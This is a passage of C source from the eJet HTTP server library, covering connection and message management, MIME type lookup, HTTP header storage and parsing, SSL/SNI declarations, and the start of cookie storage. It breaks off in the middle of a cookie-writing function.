HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->req_check = reqcheck;
mgmt->req_checkobj = checkobj;
return 0;
}
int http_set_rescheck(void * vmgmt, HTTPCBHandler * rescheck, void * checkobj)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->res_check = rescheck;
mgmt->res_checkobj = checkobj;
return 0;
}
int http_mgmt_con_add (void * vmgmt, void * vcon)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = (HTTPCon *)vcon;
if (!mgmt) return -1;
if (!pcon) return -2;
EnterCriticalSection(&mgmt->conCS);
ht_set(mgmt->con_table, &pcon->conid, pcon);
LeaveCriticalSection(&mgmt->conCS);
return 0;
}
void * http_mgmt_con_get (void * vmgmt, ulong conid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->conCS);
pcon = ht_get(mgmt->con_table, &conid);
LeaveCriticalSection(&mgmt->conCS);
return pcon;
}
void * http_mgmt_con_del (void * vmgmt, ulong conid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->conCS);
pcon = ht_delete(mgmt->con_table, &conid);
LeaveCriticalSection(&mgmt->conCS);
return pcon;
}
int http_mgmt_con_num (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
int num = 0;
if (!mgmt) return 0;
EnterCriticalSection(&mgmt->conCS);
num = ht_num(mgmt->con_table);
LeaveCriticalSection(&mgmt->conCS);
return num;
}
void * http_msg_fetch (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * msg = NULL;
if (!mgmt) return NULL;
msg = bpool_fetch(mgmt->msg_pool);
if (!msg) return NULL;
EnterCriticalSection(&mgmt->msgidCS);
msg->msgid = mgmt->msgid++;
if (msg->msgid == 0) msg->msgid = mgmt->msgid++;
LeaveCriticalSection(&mgmt->msgidCS);
msg->httpmgmt = mgmt;
msg->pcore = mgmt->pcore;
http_msg_init(msg);
http_msg_init_method(msg);
http_msg_mgmt_add(mgmt, msg);
return msg;
}
int http_msg_num (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
int num = 0;
if (!mgmt) return 0;
EnterCriticalSection(&mgmt->msgtableCS);
num = ht_num(mgmt->msg_table);
LeaveCriticalSection(&mgmt->msgtableCS);
return num;
}
void * http_get_json_conf (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return mgmt->cnfjson;
}
void * http_get_mimemgmt (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return mgmt->mimemgmt;
}
void * http_get_frame_pool (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return mgmt->frame_pool;
}
void * http_get_epump (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return mgmt->pcore;
}
int http_set_epump (void * vmgmt, void * pcore)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->pcore = pcore;
return 0;
}
char * http_get_mime (void * vmgmt, char * file, uint32 * mimeid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
char * p = NULL;
char * pend = NULL;
char * poct = NULL;
char ext[65];
int ret = 0;
if (!mgmt || !file) return "application/octet-stream";
p = str_trim(file); pend = p + strlen(p);
poct = rskipTo(pend-1, pend-p, ".", 1);
if (poct < p) return "application/octet-stream";
str_secpy(ext, sizeof(ext)-1, poct, pend - poct);
ret = mime_type_get_by_extname(mgmt->appmime, ext, &p, mimeid, NULL);
if (ret < 0 || !p || strlen(p) < 1) {
mime_type_get_by_extname(mgmt->mimemgmt, ext, &p, mimeid, NULL);
}
return p;
}
int http_conf_mime_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
void * mimeobj = NULL;
char key[64];
char * plist[8];
int plen[8];
int i, num, j, ret;
char * mime;
int mimelen;
char * ext;
int extlen;
uint32 mimeid;
uint32 appid;
if (!mgmt) return -1;
if (mgmt->appmime == NULL)
mgmt->appmime = mime_type_alloc(500);
sprintf(key, "http.mime types");
json_mget_value(mgmt->cnfjson, key, strlen(key), NULL, NULL, &mimeobj);
if (!mimeobj) return -100;
num = json_num(mimeobj);
for (i = 0; i < num; i++) {
json_iter(mimeobj, i, (void **)&mime, &mimelen, (void **)&ext, &extlen, NULL);
if (!mime || mimelen <= 0 || !ext || extlen <= 0)
continue;
ret = string_tokenize(ext, extlen, " \t,", 3, (void **)plist, plen, 8);
for (j = 0; j < ret; j++) {
if (plist[j] == NULL || plen[j] <= 0)
continue;
str_secpy(key, sizeof(key)-1, plist[j], plen[j]);
mime_type_get_by_mime(mgmt->mimemgmt, mime, NULL, &mimeid, &appid);
mime_type_add(mgmt->appmime, mime, key, mimeid, appid);
}
}
tolog(1, "eJet - MIME type resource allocated.\n");
return 0;
}
int http_conf_mime_clean (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
if (mgmt->appmime) {
mime_type_free(mgmt->appmime);
mgmt->appmime = NULL;
}
tolog(1, "eJet - MIME type resource freed.\n");
return 0;
}
<|start_filename|>include/http_dispdir.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_DISPDIR_H_
#define _HTTP_DISPDIR_H_
#ifdef __cplusplus
extern "C" {
#endif
int DisplayDirectory (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_header.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
typedef struct comm_strkey_ {
char * name;
int namelen;
} CommStrkey;
HeaderUnit * hunit_alloc ()
{
HeaderUnit * hunit = NULL;
hunit = kzalloc(sizeof(*hunit));
return hunit;
}
int hunit_free (void * vhunit)
{
HeaderUnit * hunit = (HeaderUnit *)vhunit;
if (!hunit) return -1;
kfree(hunit);
return 0;
}
void hunit_void_free (void * vhunit)
{
hunit_free(vhunit);
}
int hunit_cmp_hunit_by_name(void * a, void * b)
{
HeaderUnit * hua = (HeaderUnit *)a;
HeaderUnit * hub = (HeaderUnit *)b;
int len = 0;
int ret = 0;
if (!a || !b) return -1;
if (hua->namelen != hub->namelen) {
len = (hua->namelen > hub->namelen) ? hub->namelen : hua->namelen;
if (len <= 0) {
if (hua->namelen > 0) return 1;
else return -1;
}
ret = str_ncasecmp(HUName(hua), HUName(hub), len);
if (ret == 0) {
if (hua->namelen > hub->namelen)
return 1;
else return -1;
} else return ret;
}
if (hua->namelen <= 0) return 0;
return str_ncasecmp(HUName(hua), HUName(hub), hua->namelen);
}
ulong hunit_hash_func (void * vkey)
{
CommStrkey * key = (CommStrkey *)vkey;
static long hunit_mask = ~0U << 26;
ulong ret = 0;
uint8 * p = NULL;
int i;
if (!key) return 0;
p = (uint8 *)key->name;
for (i = 0; i < key->namelen; i++) {
ret = (ret & hunit_mask) ^ (ret << 6) ^ (tolower(*p));
p++;
}
return ret;
}
int hunit_cmp_key (void * a, void * b)
{
HeaderUnit * unit = (HeaderUnit *)a;
CommStrkey * key = (CommStrkey *)b;
int len = 0, ret;
if (!unit || !key) return -1;
if (unit->namelen != key->namelen) {
len = (unit->namelen > key->namelen) ? key->namelen : unit->namelen;
if (len <= 0) {
if (unit->namelen > 0) return 1;
return -1;
}
ret = str_ncasecmp(HUName(unit), key->name, len);
if (ret == 0) {
if (unit->namelen > key->namelen)
return 1;
else
return -1;
} else
return ret;
}
len = unit->namelen;
if (len <= 0) return 0;
return str_ncasecmp(HUName(unit), key->name, len);
}
int hunit_set_hashfunc (hashtab_t * htab)
{
if (!htab) return -1;
ht_set_hash_func(htab, hunit_hash_func);
return 0;
}
int hunit_add (hashtab_t * htab, char * name, int namelen, void * value)
{
CommStrkey key;
if (!htab) return -1;
if (!name || namelen <= 0) return -2;
if (!value) return -3;
key.name = name;
key.namelen = namelen;
return ht_set(htab, &key, value);
}
HeaderUnit * hunit_get (hashtab_t * htab, char * name, int namelen)
{
CommStrkey key;
HeaderUnit * punit = NULL;
if (!htab) return NULL;
if (!name || namelen <= 0) return NULL;
key.name = name;
key.namelen = namelen;
punit = (HeaderUnit *)ht_get(htab, &key);
return punit;
}
HeaderUnit * hunit_del (hashtab_t * htab, char * name, int namelen)
{
CommStrkey key;
HeaderUnit * punit = NULL;
if (!htab) return NULL;
if (!name || namelen <= 0) return NULL;
key.name = name;
key.namelen = namelen;
punit = (HeaderUnit *)ht_delete(htab, &key);
return punit;
}
HeaderUnit * hunit_get_from_list (arr_t * hlist, char * name, int namelen)
{
CommStrkey key;
HeaderUnit * punit = NULL;
if (!hlist) return NULL;
if (!name || namelen <= 0) return NULL;
key.name = name;
key.namelen = namelen;
punit = (HeaderUnit *)arr_find_by(hlist, &key, hunit_cmp_key);
return punit;
}
int http_header_add (void * vmsg, int type, char * name, int namelen, char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * phu = NULL;
HeaderUnit * punit = NULL;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
frame_p frame = NULL;
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
mgmt = msg->httpmgmt;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
frame = msg->req_header_stream;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
frame = msg->res_header_stream;
}
punit = hunit_get (header_table, name, namelen);
while (punit) {
phu = punit; punit = punit->next;
if (phu->valuelen == valuelen &&
str_ncasecmp(HUValue(phu), value, valuelen) ==0)
{
phu->frame = frame;
phu->name = name;
phu->namepos = HUPos(frame, name);
phu->namelen = namelen;
phu->value = value;
phu->valuepos = HUPos(frame, value);
phu->valuelen = valuelen;
return 0;
}
}
punit = bpool_fetch(mgmt->header_unit_pool);
if (!punit) {
tolog(1, "http_header_add: fetchUnit null. type=%d name=%s\n", type, name);
return -5;
}
punit->frame = frame;
punit->name = name;
punit->namepos = HUPos(frame, name);
punit->namelen = namelen;
punit->value = value;
punit->valuepos = HUPos(frame, value);
punit->valuelen = valuelen;
punit->next = NULL;
if (!phu)
hunit_add(header_table, name, namelen, punit);
else {
phu->next = punit;
}
arr_insert_by(header_list, punit, hunit_cmp_hunit_by_name);
return 0;
}
int http_header_del (void * vmsg, int type, char * name, int namelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * phu = NULL;
HeaderUnit * punit = NULL;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
mgmt = msg->httpmgmt;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
}
phu = hunit_del (header_table, name, namelen);
while (phu) {
punit = phu; phu = phu->next;
if (punit && arr_delete_ptr(header_list, punit)) {
bpool_recycle(mgmt->header_unit_pool, punit);
}
}
if (punit)
return 0;
return -100;
}
int http_header_delall (void * vmsg, int type)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * unit = NULL;
int i, num;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
frame_p frame = NULL;
if (!msg) return -1;
mgmt = msg->httpmgmt;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
frame = msg->req_header_stream;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
frame = msg->res_header_stream;
}
num = arr_num(header_list);
for (i = 0; i < num; i++) {
unit = arr_value(header_list, i);
if (!unit) continue;
bpool_recycle(mgmt->header_unit_pool, unit);
}
arr_zero(header_list);
ht_zero(header_table);
frame_empty(frame);
return 0;
}
HeaderUnit * http_header_get (void * vmsg, int type, char * name, int namelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
if (!msg) return NULL;
if (!name) return NULL;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return NULL;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
}
punit = hunit_get (header_table, name, namelen);
if (!punit)
punit = hunit_get_from_list (header_list, name, namelen);
return punit;
}
int http_header_get_int (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtod(HUValue(punit), NULL);
}
return 0;
}
uint32 http_header_get_uint32 (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtoul(HUValue(punit), NULL, 10);
}
return 0;
}
long http_header_get_long (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtol(HUValue(punit), NULL, 10);
}
return 0;
}
ulong http_header_get_ulong (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtoul(HUValue(punit), NULL, 10);
}
return 0;
}
int64 http_header_get_int64 (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtoll(HUValue(punit), NULL, 10);
}
return 0;
}
uint64 http_header_get_uint64 (void * vmsg, int type, char * name, int namelen)
{
HeaderUnit * punit = NULL;
punit = http_header_get(vmsg, type, name, namelen);
if (punit) {
return strtoull(HUValue(punit), NULL, 10);
}
return 0;
}
HeaderUnit * http_header_get_index (void * vmsg, int type, int index)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
int num;
arr_t * header_list = NULL;
if (!msg) return NULL;
if (type == 0) { //REQUEST
header_list = msg->req_header_list;
} else {
header_list = msg->res_header_list;
}
num = arr_num(header_list);
if (index < 0 || index >= num) return NULL;
punit = arr_value(header_list, index);
return punit;
}
int http_header_append (void * vmsg, int type, char * name, int namelen, char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * punit = NULL;
HeaderUnit * phu = NULL;
hashtab_t * header_table = NULL;
arr_t * header_list = NULL;
frame_p frame = NULL;
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
if (value && valuelen < 0) valuelen = str_len(value);
mgmt = msg->httpmgmt;
if (type == 0) { //REQUEST
header_table = msg->req_header_table;
header_list = msg->req_header_list;
frame = msg->req_header_stream;
} else {
header_table = msg->res_header_table;
header_list = msg->res_header_list;
frame = msg->res_header_stream;
}
punit = hunit_get (header_table, name, namelen);
while (punit) {
phu = punit; punit = punit->next;
if (phu->valuelen == valuelen &&
str_ncasecmp(HUValue(phu), value, valuelen) ==0)
{
return 0;
}
}
punit = bpool_fetch(mgmt->header_unit_pool);
if (!punit) {
return -5;
}
punit->frame = frame;
punit->namepos = frameL(frame);
frame_put_nlast(frame, name, namelen);
punit->name = (char *)frameP(frame) + punit->namepos;
punit->namelen = namelen;
frame_append(frame, ": ");
if (value && valuelen > 0) {
punit->valuepos = frameL(frame);
frame_put_nlast(frame, value, valuelen);
punit->value = (char *)frameP(frame) + punit->valuepos;
punit->valuelen = valuelen;
} else {
punit->valuepos = 0;
punit->value = NULL;
punit->valuelen = 0;
}
frame_append(frame, "\r\n");
punit->next = NULL;
if (!phu)
hunit_add(header_table, name, namelen, punit);
else
phu->next = punit;
arr_insert_by(header_list, punit, hunit_cmp_hunit_by_name);
if (type == 0) { //REQUEST
if (msg->req_header_stream == NULL)
msg->req_header_stream = frame;
} else {
if (msg->res_header_stream == NULL)
msg->res_header_stream = frame;
}
return 0;
}
/* date string defined by RFC 822, updated by RFC 1123
Sun, 17 Dec 2000 08:21:33 GMT */
int http_header_append_date (void * vmsg, int type, char * name, int namelen, time_t dtval)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
struct tm gmtval;
static char * monthname[12] = {
"Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"};
static char * weekname[7] = {"Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"};
char value[48];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
gmtval = *gmtime((time_t *)&dtval);
sprintf(value, "%s, %02d %s %4d %02d:%02d:%02d GMT",
weekname[gmtval.tm_wday],
gmtval.tm_mday,
monthname[gmtval.tm_mon],
gmtval.tm_year + 1900,
gmtval.tm_hour,
gmtval.tm_min,
gmtval.tm_sec);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
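/* Illustrative usage sketch (not part of the original source): stamp the current
time into a response header. The header name "Last-Modified" and the type value
(non-zero selects the response side, per the convention in this file) are examples.

    http_header_append_date(msg, 1, "Last-Modified", -1, time(NULL));
*/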
int http_header_append_int (void * vmsg, int type, char * name, int namelen, int ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[64];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
sprintf(value, "%d", ival);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_uint32 (void * vmsg, int type, char * name, int namelen, uint32 ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[64];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
sprintf(value, "%u", ival);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_long (void * vmsg, int type, char * name, int namelen, long ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[64];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
sprintf(value, "%ld", ival);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_ulong (void * vmsg, int type, char * name, int namelen, ulong ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[64];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
sprintf(value, "%lu", ival);
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_int64 (void * vmsg, int type, char * name, int namelen, int64 ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[128];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
#if defined(_WIN32) || defined(_WIN64)
sprintf(value, "%I64d", ival);
#else
sprintf(value, "%lld", ival);
#endif
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_header_append_uint64 (void * vmsg, int type, char * name, int namelen, uint64 ival)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char value[128];
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
memset(value, 0, sizeof(value));
#if defined(_WIN32) || defined(_WIN64)
sprintf(value, "%I64u", ival);
#else
sprintf(value, "%llu", ival);
#endif
return http_header_append(msg, type, name, namelen, value, strlen(value));
}
int http_entity_header_parse (void * vmsg, int type, char * pbyte, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pend = NULL;
char * pcolon = NULL;
char * poct = NULL;
char * name = NULL;
char * value = NULL;
int namelen = 0, valuelen = 0;
if (!msg) return -1;
if (!pbyte || len < 1) return -2;
pend = pbyte + len;
pbyte = skipOver(pbyte, len, " \t\r\n", 4);
if (pbyte >= pend) return -100;
name = pbyte;
pcolon = skipTo(pbyte, pend-pbyte, ":", 1);
if (!pcolon || pcolon >= pend) return -101;
poct = rskipOver(pcolon-1, pcolon-name, " \t", 2);
if (poct < name) return -102;
namelen = poct - name + 1;
poct = skipOver(pcolon+1, pend-pcolon-1, " \t\r", 3);
if (poct >= pend) return -200;
value = poct;
poct = rskipOver(pend-1, pend-poct, " \t\r\n", 4);
if (poct < value) {value = NULL; valuelen = 0; }
else valuelen = poct - value + 1;
http_header_append(msg, type, name, namelen, value, valuelen);
return 0;
}
<|start_filename|>include/http_ssl.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SSL_H_
#define _HTTP_SSL_H_
#ifdef HAVE_OPENSSL
#include <openssl/ssl.h>
#include <openssl/err.h>
#endif
#ifdef __cplusplus
extern "C" {
#endif
#ifdef HAVE_OPENSSL
int http_ssl_library_init ();
void * http_ssl_server_ctx_init (char * cert, char * prikey, char * cacert);
void * http_ssl_client_ctx_init (char * cert, char * prikey, char * cacert);
int http_ssl_ctx_free (void * vctx);
SSL * http_ssl_new (SSL_CTX * ctx, void * vcon);
int http_ssl_free (SSL * ssl);
void * http_con_from_ssl (SSL * ssl);
/* During the TLS handshake, the client's 'Client Hello' carries the requested server
name. The server name is passed to this callback so that the appropriate certificate
and private key can be selected; this is the SNI mechanism defined in the TLS spec.
It allows multiple certificates to serve different host names on one listen port. */
int http_ssl_servername_select (SSL * ssl, int * ad, void * arg);
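/* A minimal registration sketch (assuming an OpenSSL build; 'ctx' and 'arg' are
placeholders for whatever the implementation actually passes). The callback above
is typically hooked into the listen-side SSL_CTX so that OpenSSL invokes it when
the ClientHello carries an SNI extension:

    SSL_CTX_set_tlsext_servername_callback(ctx, http_ssl_servername_select);
    SSL_CTX_set_tlsext_servername_arg(ctx, arg);
*/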
#endif
int http_ssl_accept (void * vcon);
int http_ssl_connect (void * vcon);
int http_con_read (void * vcon, frame_p frm, int * num, int * err);
int http_con_writev (void * vcon, void * piov, int iovcnt, int * num, int * err);
int http_con_sendfile (void * vcon, int filefd, int64 pos, int64 size, int * num, int * err);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_handle.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_HANDLE_H_
#define _HTTP_HANDLE_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_msg_handle (void * vcon, void * vmsg);
int http_connect_process (void * vcon, void * vmsg);
int http_request_process (void * vcon, void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_cookie.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_cookie.h"
void * http_cookie_alloc ()
{
cookie_t * ckie = NULL;
ckie = kzalloc(sizeof(*ckie));
if (!ckie) return NULL;
ckie->createtime = time(0);
return ckie;
}
void http_cookie_free (void * vckie)
{
cookie_t * ckie = (cookie_t *)vckie;
if (!ckie) return;
if (ckie->name) {
kfree(ckie->name);
ckie->name = NULL;
}
if (ckie->value) {
kfree(ckie->value);
ckie->value = NULL;
}
if (ckie->path) {
kfree(ckie->path);
ckie->path = NULL;
}
if (ckie->domain) {
kfree(ckie->domain);
ckie->domain = NULL;
}
kfree(ckie);
}
void * cookie_path_alloc ()
{
cookie_path_t * ckpath = NULL;
ckpath = kzalloc(sizeof(*ckpath));
if (!ckpath) return NULL;
ckpath->cookie_list = arr_new(4);
return ckpath;
}
void cookie_path_free (void * vpath)
{
cookie_path_t * ckpath = (cookie_path_t *)vpath;
if (!ckpath) return;
if (ckpath->cookie_list) {
arr_free(ckpath->cookie_list);
ckpath->cookie_list = NULL;
}
kfree(ckpath);
}
void * cookie_domain_alloc ()
{
cookie_domain_t * ckdomain = NULL;
ckdomain = kzalloc(sizeof(*ckdomain));
if (!ckdomain) return NULL;
ckdomain->cookie_path_trie = actrie_init(128, NULL, 0);
ckdomain->cookie_path_list = arr_new(4);
return ckdomain;
}
void cookie_domain_free (void * vdomain)
{
cookie_domain_t * ckdomain = (cookie_domain_t *)vdomain;
if (!ckdomain) return;
if (ckdomain->cookie_path_trie) {
actrie_free(ckdomain->cookie_path_trie);
ckdomain->cookie_path_trie = NULL;
}
if (ckdomain->cookie_path_list) {
arr_pop_free(ckdomain->cookie_path_list, cookie_path_free);
ckdomain->cookie_path_list = NULL;
}
kfree(ckdomain);
}
int cookie_domain_cmp_name (void * a, void * b)
{
cookie_domain_t * ckdomain = (cookie_domain_t *)a;
ckstr_t * str = (ckstr_t *)b;
int len = 0;
int ret = 0;
if (!ckdomain) return -1;
if (!str || str->len <= 0) return 1;
ret = strncasecmp(ckdomain->domain, str->p, str->len);
if (ret == 0) {
if ((len = strlen(ckdomain->domain)) == str->len)
return 0;
else if (len > str->len)
return 1;
else
return -1;
}
return ret;
}
ulong cookie_domain_hash (void * vkey)
{
ckstr_t * key = (ckstr_t *)vkey;
if (!key) return 0;
return string_hash(key->p, key->len, 0);
}
void * cookie_domain_path_get (void * vdom, char * path, int pathlen)
{
cookie_domain_t * ckdomain = (cookie_domain_t *)vdom;
cookie_path_t * ckpath = NULL;
int i, num;
if (!ckdomain) return NULL;
if (!path) return NULL;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return NULL;
num = arr_num(ckdomain->cookie_path_list);
for (i = 0; i < num; i++) {
ckpath = arr_value(ckdomain->cookie_path_list, i);
if (!ckpath) continue;
if (strncasecmp(ckpath->path, path, pathlen) == 0 && strlen(ckpath->path) == pathlen)
return ckpath;
}
return NULL;
}
void * cookie_mgmt_alloc (void * vhttpmgmt, char * ckiefile)
{
CookieMgmt * mgmt = NULL;
mgmt = kzalloc(sizeof(*mgmt));
if (!mgmt) return NULL;
mgmt->httpmgmt = vhttpmgmt;
InitializeCriticalSection(&mgmt->cookieCS);
mgmt->domain_trie = actrie_init(128, NULL, 1);
mgmt->domain_table = ht_new(128, cookie_domain_cmp_name);
ht_set_hash_func(mgmt->domain_table, cookie_domain_hash);
mgmt->cookie_list = arr_new(4);
mgmt->cookie_file = ckiefile;
cookie_mgmt_read(mgmt, ckiefile);
cookie_mgmt_scan(mgmt);
tolog(1, "eJet - Cookie storage %s init\n", ckiefile);
return mgmt;
}
void cookie_mgmt_free (void * vmgmt)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
if (!mgmt) return;
DeleteCriticalSection(&mgmt->cookieCS);
if (mgmt->domain_table) {
ht_free_all(mgmt->domain_table, cookie_domain_free);
mgmt->domain_table = NULL;
}
if (mgmt->domain_trie) {
actrie_free(mgmt->domain_trie);
mgmt->domain_trie = NULL;
}
if (mgmt->cookie_list) {
arr_pop_free(mgmt->cookie_list, http_cookie_free);
mgmt->cookie_list = NULL;
}
if (mgmt->scan_timer) {
iotimer_stop(mgmt->scan_timer);
mgmt->scan_timer = NULL;
}
kfree(mgmt);
tolog(1, "eJet - Cookie resource freed.\n");
}
void * cookie_mgmt_domain_get (void * vmgmt, char * domain, int domainlen)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
ckstr_t str = ckstr_init(domain, domainlen);
cookie_domain_t * domobj = NULL;
if (!mgmt) return NULL;
if (!domain) return NULL;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return NULL;
domobj = ht_get(mgmt->domain_table, &str);
return domobj;
}
int cookie_mgmt_domain_set (void * vmgmt, char * domain, int domainlen, void * domobj)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
ckstr_t str = ckstr_init(domain, domainlen);
if (!mgmt) return -1;
if (!domain) return -2;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return -3;
if (!domobj) return -4;
ht_set(mgmt->domain_table, &str, domobj);
return 0;
}
int cookie_mgmt_read (void * vmgmt, char * cookiefile)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
FILE * fp = NULL;
char buf[4096];
char * p = NULL;
int len = 0;
if (!mgmt) return -1;
if (!cookiefile || !file_exist(cookiefile))
return -2;
fp = fopen(cookiefile, "r+");
if (!fp) return -3;
mgmt->cookie_file = cookiefile;
buf[0] = '\0';
while (fgets(buf, sizeof(buf)-1, fp) != NULL) {
p = str_trim(buf);
len = strlen(p);
if (len <= 0 || *p == '#')
continue;
cookie_mgmt_parse(mgmt, p, len, "", 0);
}
if (fp) fclose(fp);
return 0;
}
int cookie_mgmt_write (void * vmgmt, char * cookiefile)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_domain_t * ckdomain = NULL;
cookie_path_t * ckpath = NULL;
cookie_t * ckie = NULL;
FILE * fp = NULL;
frame_p frm = NULL;
char buf[64];
int i, num;
int j, pathnum;
int k, cknum;
